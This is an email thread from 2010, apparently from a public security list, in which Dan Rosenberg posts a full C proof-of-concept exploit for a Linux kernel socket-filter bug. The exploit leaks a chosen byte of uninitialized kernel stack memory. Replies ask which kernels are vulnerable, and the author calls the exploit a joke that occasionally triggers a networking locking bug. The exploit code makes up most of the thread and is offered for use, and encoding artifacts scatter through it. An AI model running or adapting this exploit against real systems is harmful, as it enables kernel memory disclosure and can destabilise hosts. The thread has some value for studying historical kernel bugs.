Felipe,
The bug goes back all the way to 2.4.0. But please keep in mind that
this exploit was intended as a joke - it only allows you to read a
single byte of uninitialized kernel stack memory, out of a 64-byte
buffer. In addition, you're not even guaranteed to be reading
contiguous data if you request sequential bytes. Even considering the
fact that on x86, the memory will be read from the soft IRQ stack
instead of the current process kernel stack, I seriously doubt that
you could get anything useful out of a single byte that probably just
contains garbage from previous functions in the call path.
I've gotten reports that this code happens to occasionally trigger a
strange locking bug in the networking stack, which is just a funny
accident.
-Dan
On Wed, Nov 17, 2010 at 8:41 PM, Felipe Martins
<martins.felipe.security@gmail.com> wrote:
> Dan,
>
> =A0 =A0What kernel versions are vulnerable to this one ?
>
> Felipe
>
> On 10/11/2010 17:05, James Lay wrote:
>>
>> What kernel version(s) is/are impacted? =A0Tried on one and no workie.
>>
>> James
>>
>>
>> On 11/9/10 3:18 PM, "Dan Rosenberg"<dan.j.rosenberg@gmail.com> =A0wrote:
>>
>>> Enjoy...
>>>
>>> -Dan
>>>
>>>
>>> /*
>>> * You've done it. =A0After hours of gdb and caffeine, you've finally go=
t a
>>> shell
>>> * on your target's server. =A0Maybe next time they will think twice abo=
ut
>>> * running MyFirstCompSciProjectFTPD on a production machine. =A0As you =
take
>>> * another sip of Mountain Dew and pick some of the cheetos out of your
>>> beard,
>>> * you begin to plan your next move - it's time to tackle the kernel.
>>> *
>>> * What should be your goal? =A0Privilege escalation? =A0That's impossib=
le,
>>> there's
>>> * no such thing as a privilege escalation vulnerability on Linux.
>>> Denial of
>>> * service? =A0What are you, some kind of script kiddie? =A0No, the answ=
er is
>>> * obvious. =A0You must read the uninitialized bytes of the kernel stack=
,
>>> since
>>> * these bytes contain all the secrets of the universe and the meaning o=
f
>>> life.
>>> *
>>> * How can you accomplish this insidious feat? =A0You immediately discar=
d
>>> the
>>> * notion of looking for uninitialized struct members that are copied
>>> back to
>>> * userspace, since you clearly need something far more elite. =A0In ord=
er
>>> to
>>> * prove your superiority, your exploit must be as sophisticated as your
>>> taste
>>> * in obscure electronic music. =A0After scanning the kernel source for =
good
>>> * candidates, you find your target and begin to code...
>>> *
>>> * by Dan Rosenberg
>>> *
>>> * Greets to kees, taviso, jono, spender, hawkes, and bla
>>> *
>>> */
>>>
>>> #include<string.h>
>>> #include<stdio.h>
>>> #include<netinet/in.h>
>>> #include<sys/socket.h>
>>> #include<unistd.h>
>>> #include<stdlib.h>
>>> #include<linux/filter.h>
>>>
>>> #define PORT 37337
>>>
>>> int transfer(int sendsock, int recvsock)
>>> {
>>>
>>> =A0 =A0struct sockaddr_in addr;
>>> =A0 =A0char buf[512];
>>> =A0 =A0int len =3D sizeof(addr);
>>>
>>> =A0 =A0memset(buf, 0, sizeof(buf));
>>>
>>> =A0 =A0if (fork())
>>> =A0 =A0 =A0 =A0return recvfrom(recvsock, buf, 512, 0, (struct sockaddr =
*)&addr,
>>> &len);
>>>
>>> =A0 =A0sleep(1);
>>>
>>> =A0 =A0memset(&addr, 0, sizeof(addr));
>>> =A0 =A0addr.sin_family =3D AF_INET;
>>> =A0 =A0addr.sin_port =3D htons(PORT);
>>> =A0 =A0addr.sin_addr.s_addr =3D inet_addr("127.0.0.1");
>>>
>>> =A0 =A0sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len);
>>>
>>> =A0 =A0exit(0);
>>>
>>> }
>>>
>>> int main(int argc, char * argv[])
>>> {
>>>
>>> =A0 =A0int sendsock, recvsock, ret;
>>> =A0 =A0unsigned int val;
>>> =A0 =A0struct sockaddr_in addr;
>>> =A0 =A0struct sock_fprog fprog;
>>> =A0 =A0struct sock_filter filters[5];
>>>
>>> =A0 =A0if (argc !=3D 2) {
>>> =A0 =A0 =A0 =A0printf("[*] Usage: %s offset (0-63)\n", argv[0]);
>>> =A0 =A0 =A0 =A0return -1;
>>> =A0 =A0}
>>>
>>> =A0 =A0val =3D atoi(argv[1]);
>>>
>>> =A0 =A0if (val> =A063) {
>>> =A0 =A0 =A0 =A0printf("[*] Invalid byte offset (must be 0-63)\n");
>>> =A0 =A0 =A0 =A0return -1;
>>> =A0 =A0}
>>>
>>> =A0 =A0recvsock =3D socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
>>> =A0 =A0sendsock =3D socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
>>>
>>> =A0 =A0if (recvsock< =A00 || sendsock< =A00) {
>>> =A0 =A0 =A0 =A0printf("[*] Could not create sockets.\n");
>>> =A0 =A0 =A0 =A0return -1;
>>> =A0 =A0}
>>>
>>> =A0 =A0memset(&addr, 0, sizeof(addr));
>>> =A0 =A0addr.sin_family =3D AF_INET;
>>> =A0 =A0addr.sin_port =3D htons(PORT);
>>> =A0 =A0addr.sin_addr.s_addr =3D htonl(INADDR_ANY);
>>>
>>> =A0 =A0if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr))< =A00=
) {
>>> =A0 =A0 =A0 =A0printf("[*] Could not bind socket.\n");
>>> =A0 =A0 =A0 =A0return -1;
>>> =A0 =A0}
>>>
>>> =A0 =A0memset(&fprog, 0, sizeof(fprog));
>>> =A0 =A0memset(filters, 0, sizeof(filters));
>>>
>>> =A0 =A0filters[0].code =3D BPF_LD|BPF_MEM;
>>> =A0 =A0filters[0].k =3D (val& =A0~0x3) / 4;
>>>
>>> =A0 =A0filters[1].code =3D BPF_ALU|BPF_AND|BPF_K;
>>> =A0 =A0filters[1].k =3D 0xff<< =A0((val % 4) * 8);
>>>
>>> =A0 =A0filters[2].code =3D BPF_ALU|BPF_RSH|BPF_K;
>>> =A0 =A0filters[2].k =3D (val % 4) * 8;
>>>
>>> =A0 =A0filters[3].code =3D BPF_ALU|BPF_ADD|BPF_K;
>>> =A0 =A0filters[3].k =3D 256;
>>>
>>> =A0 =A0filters[4].code =3D BPF_RET|BPF_A;
>>>
>>> =A0 =A0fprog.len =3D 5;
>>> =A0 =A0fprog.filter =3D filters;
>>>
>>> =A0 =A0if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER,&fprog,
>>> sizeof(fprog))< =A00) {
>>> =A0 =A0 =A0 =A0printf("[*] Failed to install filter.\n");
>>> =A0 =A0 =A0 =A0return -1;
>>> =A0 =A0}
>>>
>>> =A0 =A0ret =3D transfer(sendsock, recvsock);
>>>
>>> =A0 =A0printf("[*] Your byte: 0x%.02x\n", ret - 248);
>>>
>>> }
>>>
>>
>
> --
> Felipe Martins<BR>
> Security Analyst<BR>
> E-mail: martins.felipe.security@gmail.com<BR>
> Skype: martins.felipe<BR>
>
>
討論串 (同標題文章)